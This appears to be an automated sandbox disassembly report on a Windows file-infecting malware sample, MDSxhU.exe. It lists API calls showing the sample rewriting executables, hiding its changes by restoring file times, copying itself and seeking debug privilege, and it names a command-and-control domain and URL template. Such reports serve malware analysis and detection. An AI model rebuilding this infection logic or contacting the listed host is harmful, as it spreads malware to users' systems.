                                                                                    control_flow_graph 16 ad1e6e-ad1e95 call ad2d60 19 ad1e9c-ad1eaa call ad1df6 16->19 20 ad1e97 call ad1d8a 16->20 24 ad1eb0-ad1ed9 SetFileAttributesA CreateFileA 19->24 25 ad2332 19->25 20->19 24->25 26 ad1edf-ad1f28 call ad1915 SetFilePointer CreateFileMappingA MapViewOfFile 24->26 27 ad2338-ad233b 25->27 26->25 36 ad1f2e-ad1f39 26->36 29 ad233d-ad2340 UnmapViewOfFile 27->29 30 ad2346-ad2349 27->30 29->30 32 ad234b-ad234e FindCloseChangeNotification 30->32 33 ad2350-ad2354 30->33 32->33 34 ad2356-ad235b CloseHandle 33->34 35 ad2391-ad239a call ad2d9b 33->35 34->35 36->25 38 ad1f3f-ad1f56 36->38 38->25 40 ad1f5c-ad1f64 38->40 40->25 41 ad1f6a-ad1f70 40->41 41->25 42 ad1f76-ad1f87 call ad1c81 41->42 42->25 45 ad1f8d-ad1fa7 call ad185b call ad1c81 42->45 45->25 50 ad1fad-ad1fb4 45->50 51 ad2024-ad2045 50->51 52 ad1fb6-ad1fc5 call ad1af9 50->52 51->25 53 ad204b-ad204e 51->53 52->51 60 ad1fc7-ad1fd2 52->60 55 ad2070-ad20f4 call ad1af9 * 2 call ad1c68 * 2 memset * 2 53->55 56 ad2050-ad2053 53->56 78 ad20f5-ad20fe 55->78 58 ad2056-ad205a 56->58 58->55 61 ad205c-ad2061 58->61 60->25 63 ad1fd8-ad1fe7 60->63 61->25 64 ad2067-ad206e 61->64 66 ad1fef-ad2006 call ad1af9 63->66 67 ad1fe9-ad1fec 63->67 64->58 73 ad2008-ad200e call ad1c68 66->73 74 ad2013-ad201e FlushViewOfFile 66->74 67->66 73->74 74->51 79 ad2130-ad2139 78->79 80 ad2100-ad2114 78->80 83 ad213c-ad2142 79->83 81 ad212d-ad212e 80->81 82 ad2116-ad212a 80->82 81->78 82->81 84 ad215c 83->84 85 ad2144-ad2150 83->85 88 ad215f-ad2162 84->88 86 ad2157-ad215a 85->86 87 ad2152-ad2154 85->87 86->83 87->86 89 ad2164-ad2171 88->89 90 ad2181-ad2184 88->90 93 ad232a-ad232d 89->93 94 ad2177-ad217e 89->94 91 ad218d-ad21ba call ad1c68 90->91 92 ad2186 90->92 97 ad21bc-ad21d0 call ad1c68 91->97 98 ad21d3-ad220b call ad1c81 call ad1c68 91->98 92->91 93->88 94->90 97->98 105 ad220d-ad2218 call ad1c68 98->105 106 ad221b-ad221e 98->106 105->106 107 ad2226-ad231a memcpy UnmapViewOfFile CloseHandle call ad1b8a call ad185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call ad1915 106->107 108 ad2220-ad2223 106->108 116 ad231f-ad2328 CloseHandle 107->116 108->107 116->27
                                                                                    APIs
                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?,00AD32B0,00000164,00AD2986,?), ref: 00AD1EB9
                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00AD1ECD
                                                                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00AD1EF3
                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00AD1F07
                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00AD1F1D
                                                                                    • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00AD201E
                                                                                    • memset.MSVCRT ref: 00AD20D8
                                                                                    • memset.MSVCRT ref: 00AD20EA
                                                                                    • memcpy.MSVCRT ref: 00AD222D
                                                                                    • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AD2238
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AD224A
                                                                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AD22C6
                                                                                    • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AD22CB
                                                                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AD22DD
                                                                                    • WriteFile.KERNEL32(000000FF,00AD4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AD22F7
                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AD230D
                                                                                    • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AD2322
                                                                                    • UnmapViewOfFile.KERNEL32(?,?,00AD32B0,00000164,00AD2986,?), ref: 00AD2340
                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,00AD32B0,00000164,00AD2986,?), ref: 00AD234E
                                                                                    • CloseHandle.KERNEL32(000000FF,?,00AD32B0,00000164,00AD2986,?), ref: 00AD2359
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseView$HandlePointer$CreateUnmapWritememset$AttributesChangeFindFlushMappingNotificationmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1893444929-0
                                                                                    • Opcode ID: 86f3c588abbbe7d0b295f20deada50d0fe6d2ee558cede6d4adf3b73f81dd393
                                                                                    • Instruction ID: bc1eba4ef3808dec45af9508ff5978d375af873459ad86a774c5ee7c7db8f420
                                                                                    • Opcode Fuzzy Hash: 86f3c588abbbe7d0b295f20deada50d0fe6d2ee558cede6d4adf3b73f81dd393
                                                                                    • Instruction Fuzzy Hash: 9DF15A71901208EFCB20DFA4DD85AADBBB5FF18314F10852AE51AAB761D730AD92CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 117 ad1973-ad199a PathFileExistsA 118 ad1ac7-ad1acc 117->118 119 ad19a0-ad19aa 117->119 121 ad1ace 118->121 122 ad1ad0-ad1ad5 118->122 120 ad19af-ad19c2 CreateFileA 119->120 123 ad1a28-ad1a36 GetFileSize 120->123 124 ad19c4-ad19d3 Sleep 120->124 121->122 125 ad1ad7-ad1ad9 122->125 126 ad1af0-ad1af6 122->126 128 ad1a38-ad1a3b 123->128 129 ad1a87-ad1a8b 123->129 124->120 127 ad19d5-ad1a0b call ad185b wsprintfA CopyFileA 124->127 125->126 127->123 141 ad1a0d-ad1a26 CreateFileA 127->141 128->129 133 ad1a3d-ad1a51 VirtualAlloc 128->133 130 ad1a8d-ad1a90 FindCloseChangeNotification 129->130 131 ad1a96-ad1a9a 129->131 130->131 134 ad1aad-ad1ab1 131->134 135 ad1a9c 131->135 133->129 137 ad1a53-ad1a57 133->137 139 ad1adb-ad1ae0 134->139 140 ad1ab3-ad1ab6 134->140 138 ad1aa0-ad1aa7 DeleteFileA 135->138 142 ad1a59-ad1a6d ReadFile 137->142 143 ad1a80 137->143 138->134 146 ad1ae7-ad1aec 139->146 147 ad1ae2-ad1ae5 139->147 140->118 144 ad1ab8-ad1ac1 VirtualFree 140->144 141->123 145 ad1a9e 141->145 142->129 148 ad1a6f-ad1a7e 142->148 143->129 144->118 145->138 146->126 149 ad1aee 146->149 147->146 148->142 148->143 149->126
                                                                                    APIs
                                                                                    • PathFileExistsA.SHLWAPI(00AD4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe), ref: 00AD1992
                                                                                    • CreateFileA.KERNEL32(00AD4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AD19BA
                                                                                    • Sleep.KERNEL32(00000064), ref: 00AD19C6
                                                                                    • wsprintfA.USER32 ref: 00AD19EC
                                                                                    • CopyFileA.KERNEL32(00AD4E5C,?,00000000), ref: 00AD1A00
                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AD1A1E
                                                                                    • GetFileSize.KERNEL32(00AD4E5C,00000000), ref: 00AD1A2C
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AD1A46
                                                                                    • ReadFile.KERNEL32(00AD4E5C,00AD4E60,00000000,?,00000000), ref: 00AD1A65
                                                                                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00AD1A90
                                                                                    • DeleteFileA.KERNEL32(?), ref: 00AD1AA7
                                                                                    • VirtualFree.KERNEL32(00AD4E60,00000000,00008000), ref: 00AD1AC1
                                                                                    Strings
                                                                                    • C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe, xrefs: 00AD197C
                                                                                    • %s%.8X.data, xrefs: 00AD19E6
                                                                                    • 2, xrefs: 00AD19CF
                                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00AD19DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                                                    • String ID: %s%.8X.data$2$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe
                                                                                    • API String ID: 2523042076-2650615005
                                                                                    • Opcode ID: e1e0aaaa520e0f151bac304a1d72a100ce23312dd9aed1e234275104388fbd80
                                                                                    • Instruction ID: c97d29b152f3a7a17a839e1349f9ffcfe11bb6b18b28c9ccd2680c67d50806db
                                                                                    • Opcode Fuzzy Hash: e1e0aaaa520e0f151bac304a1d72a100ce23312dd9aed1e234275104388fbd80
                                                                                    • Instruction Fuzzy Hash: AA511A71901219BFDF10DFD8CD84AAEBBB9FB05394F10456AF517A62A0D3709E41CB90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 150 ad28b8-ad28ff memset wsprintfA 151 ad29db-ad29df 150->151 152 ad2905-ad290d 150->152 152->151 153 ad2913-ad2919 152->153 154 ad291b-ad294c memset wsprintfA call ad29e2 153->154 155 ad2956-ad2965 strrchr 153->155 158 ad2951 154->158 155->151 157 ad2967-ad2978 lstrcmpiA 155->157 159 ad2988-ad2992 lstrcmpiA 157->159 160 ad297a-ad2981 call ad1e6e 157->160 158->151 159->151 162 ad2994-ad299b 159->162 163 ad2986 160->163 164 ad29ad-ad29c9 strstr 162->164 165 ad299d-ad29a3 162->165 163->151 167 ad29cb-ad29d1 call ad239d 164->167 168 ad29d3-ad29d6 call ad2692 164->168 165->164 166 ad29a5-ad29a7 lstrcpy 165->166 166->164 167->151 168->151
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00AD28D3
                                                                                    • wsprintfA.USER32 ref: 00AD28F7
                                                                                    • memset.MSVCRT ref: 00AD2925
                                                                                    • wsprintfA.USER32 ref: 00AD2940
                                                                                      • Part of subcall function 00AD29E2: memset.MSVCRT ref: 00AD2A02
                                                                                      • Part of subcall function 00AD29E2: wsprintfA.USER32 ref: 00AD2A1A
                                                                                      • Part of subcall function 00AD29E2: memset.MSVCRT ref: 00AD2A44
                                                                                      • Part of subcall function 00AD29E2: lstrlen.KERNEL32(?), ref: 00AD2A54
                                                                                      • Part of subcall function 00AD29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00AD2A6C
                                                                                      • Part of subcall function 00AD29E2: strrchr.MSVCRT ref: 00AD2A7C
                                                                                      • Part of subcall function 00AD29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00AD2A9F
                                                                                      • Part of subcall function 00AD29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00AD2AAE
                                                                                      • Part of subcall function 00AD29E2: memset.MSVCRT ref: 00AD2AC6
                                                                                      • Part of subcall function 00AD29E2: memset.MSVCRT ref: 00AD2ADA
                                                                                      • Part of subcall function 00AD29E2: FindFirstFileA.KERNEL32(?,?), ref: 00AD2AEF
                                                                                      • Part of subcall function 00AD29E2: memset.MSVCRT ref: 00AD2B13
                                                                                    • strrchr.MSVCRT ref: 00AD2959
                                                                                    • lstrcmpiA.KERNEL32(00000001,exe), ref: 00AD2974
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                                    • String ID: %s%s$%s\$C:\Users\user~1\AppData\Local\Temp\$exe$rar
                                                                                    • API String ID: 3004273771-4092107658
                                                                                    • Opcode ID: 3ca607c224039c8fd17c989b318b2aeb09c6c3b2778ed232639dcc8251fa2ffc
                                                                                    • Instruction ID: 6ebc4d909ca5dc7ff3c403debe25f875ec5b0524b1b1f45a84a486c4dde25296
                                                                                    • Opcode Fuzzy Hash: 3ca607c224039c8fd17c989b318b2aeb09c6c3b2778ed232639dcc8251fa2ffc
                                                                                    • Instruction Fuzzy Hash: 773193B69403197BDF20DBA4DC95FDA776CAB34710F040853F587A2281E6B4DAC5CBA1

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\,?,00000005,00000000), ref: 00AD164F
                                                                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00AD165B
                                                                                    • GetModuleFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe,00000104), ref: 00AD166E
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00AD1099,00000000,00000000,00000000), ref: 00AD16AC
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00AD16BD
                                                                                      • Part of subcall function 00AD139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe), ref: 00AD13BC
                                                                                      • Part of subcall function 00AD139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00AD13DA
                                                                                      • Part of subcall function 00AD139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00AD1448
                                                                                    • lstrcpy.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe), ref: 00AD16E5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe$C:\Windows\system32$Documents and Settings
                                                                                    • API String ID: 123563730-119338138
                                                                                    • Opcode ID: 6bfbb9aff07aa392699aeaf1f8a92f605209c61fa64c45fc38da704a40697308
                                                                                    • Instruction ID: 341484c03a8ac2e6ffd6d8a7170f9cd7cdf3b45c73815e26b903a0bc35bf8ef5
                                                                                    • Opcode Fuzzy Hash: 6bfbb9aff07aa392699aeaf1f8a92f605209c61fa64c45fc38da704a40697308
                                                                                    • Instruction Fuzzy Hash: 87116372542214BBDF20A7E5AD49EDB3F6DEB59761F040013F24B912B0D6718A42CBB2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 205 ad1000-ad1023 CreateFileA 206 ad1025-ad1055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 ad1092-ad1096 205->207 208 ad107b-ad1085 206->208 209 ad1057-ad105f 206->209 212 ad108d-ad1091 CloseHandle 208->212 213 ad1087-ad108b CloseHandle 208->213 210 ad1074-ad1075 UnmapViewOfFile 209->210 211 ad1061-ad106e call ad17d0 209->211 210->208 211->210 212->207 213->212
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00AD10E8,?), ref: 00AD1018
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A38400,?,http://%s:%d/%s/%s,00AD10E8,?), ref: 00AD1029
                                                                                    • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00AD1038
                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00AD10E8,?), ref: 00AD104B
                                                                                    • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00AD10E8,?), ref: 00AD1075
                                                                                    • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00AD10E8,?), ref: 00AD108B
                                                                                    • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00AD10E8,?), ref: 00AD108E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                    • API String ID: 1223616889-3273462101
                                                                                    • Opcode ID: 5de3c780b89d46d1e3c31c9247a6d800e4803fdb99f0a630b5bf8bbcd01943fa
                                                                                    • Instruction ID: d7d307119490fddb2766fdf341ba69fec421a203dbb5699f7ec1d5341fe33667
                                                                                    • Opcode Fuzzy Hash: 5de3c780b89d46d1e3c31c9247a6d800e4803fdb99f0a630b5bf8bbcd01943fa
                                                                                    • Instruction Fuzzy Hash: B001967210135CBFEB30AFA09C88E2BBBACDB44799F00452BF246A2190D6705E458B71

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 375 ad2c48-ad2c75 memset call ad1973 378 ad2c77-ad2c7f 375->378 379 ad2cb2-ad2cb9 375->379 380 ad2c8f-ad2cac CreateThread WaitForMultipleObjects 378->380 381 ad2c81-ad2c8b 378->381 382 ad2cc8-ad2ccc 379->382 383 ad2cbb-ad2cc2 VirtualFree 379->383 380->379 381->380 383->382
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00AD2C57
                                                                                      • Part of subcall function 00AD1973: PathFileExistsA.SHLWAPI(00AD4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe), ref: 00AD1992
                                                                                      • Part of subcall function 00AD1973: CreateFileA.KERNEL32(00AD4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AD19BA
                                                                                      • Part of subcall function 00AD1973: Sleep.KERNEL32(00000064), ref: 00AD19C6
                                                                                      • Part of subcall function 00AD1973: wsprintfA.USER32 ref: 00AD19EC
                                                                                      • Part of subcall function 00AD1973: CopyFileA.KERNEL32(00AD4E5C,?,00000000), ref: 00AD1A00
                                                                                      • Part of subcall function 00AD1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AD1A1E
                                                                                      • Part of subcall function 00AD1973: GetFileSize.KERNEL32(00AD4E5C,00000000), ref: 00AD1A2C
                                                                                      • Part of subcall function 00AD1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AD1A46
                                                                                      • Part of subcall function 00AD1973: ReadFile.KERNEL32(00AD4E5C,00AD4E60,00000000,?,00000000), ref: 00AD1A65
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00AD2B8C,00000000,00000000,00000000), ref: 00AD2C99
                                                                                    • WaitForMultipleObjects.KERNEL32(00000001,00AD16BA,00000001,000000FF,?,00AD16BA,00000000), ref: 00AD2CAC
                                                                                    • VirtualFree.KERNEL32(01320000,00000000,00008000,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe,00AD4E5C,00AD4E60,?,00AD16BA,00000000), ref: 00AD2CC2
                                                                                    Strings
                                                                                    • C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe, xrefs: 00AD2C69
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe
                                                                                    • API String ID: 2042498389-4100433038
                                                                                    • Opcode ID: fdf9081af90c4ca29dc354e081255bcdbd23b8a8a89c0ac8fb41db477bb580b4
                                                                                    • Instruction ID: fe3734b69d73146a13b9a0e863f501881ef26186c8955a2b262ccfee7f922a02
                                                                                    • Opcode Fuzzy Hash: fdf9081af90c4ca29dc354e081255bcdbd23b8a8a89c0ac8fb41db477bb580b4
                                                                                    • Instruction Fuzzy Hash: 120171716422207BD710D7D59C1AFEB7F5DEF55B50F104522B51796281D9A09A00C7A1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 384 ad14e1-ad14fb 385 ad14fd-ad1510 GetModuleHandleA 384->385 386 ad1541-ad1547 384->386 387 ad151a-ad1535 VirtualQuery 385->387 388 ad1512-ad1518 385->388 389 ad1549-ad154c 386->389 390 ad1573-ad1574 call ad1638 386->390 392 ad153b 387->392 393 ad1537-ad1539 387->393 388->386 394 ad154e-ad1555 389->394 395 ad1569-ad1570 389->395 397 ad1579-ad157a ExitProcess 390->397 392->386 393->386 393->392 394->395 396 ad1557-ad1566 call ad1af9 394->396 396->395
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00AD1504
                                                                                    • VirtualQuery.KERNEL32(00AD14E1,?,0000001C), ref: 00AD1525
                                                                                    • ExitProcess.KERNEL32 ref: 00AD157A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitHandleModuleProcessQueryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3946701194-0
                                                                                    • Opcode ID: 26279219c3eeae579216a8beff0e32c83108aec1ba548d97fae5293d83efd7d3
                                                                                    • Instruction ID: 473a0d2ee7d6a583a985b7c65435a4c91d7bc99a94b55d6ba896c794e67a61dd
                                                                                    • Opcode Fuzzy Hash: 26279219c3eeae579216a8beff0e32c83108aec1ba548d97fae5293d83efd7d3
                                                                                    • Instruction Fuzzy Hash: 3F115EB1A42214FFCB21DFE5B885ABD77BDEB88751B10402BF443D2250D2788942DF51

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 400 ad1915-ad1922 401 ad1928-ad192c 400->401 402 ad1924-ad1926 400->402 403 ad194f-ad1952 401->403 404 ad192e-ad194d memset GetFileTime 401->404 405 ad196e-ad1970 402->405 403->405 407 ad1954-ad1960 SetFileTime 403->407 406 ad1966-ad1968 404->406 408 ad196c 406->408 409 ad196a 406->409 407->406 408->405 409->408
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileTimememset
                                                                                    • String ID:
                                                                                    • API String ID: 176422537-0
                                                                                    • Opcode ID: c25fab29ce07d451f7815a04f6aa1a3787fec897daaef4861d94e4aacb4ceb71
                                                                                    • Instruction ID: a6f6f8486806a4fc4755f16a5b769ce9d743858b7c536380475d629ca17b5df1
                                                                                    • Opcode Fuzzy Hash: c25fab29ce07d451f7815a04f6aa1a3787fec897daaef4861d94e4aacb4ceb71
                                                                                    • Instruction Fuzzy Hash: 0BF04F32200209BBDB20DF66DC14BAB77ACAB50761F40853BF537D1290E730EA45CBA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
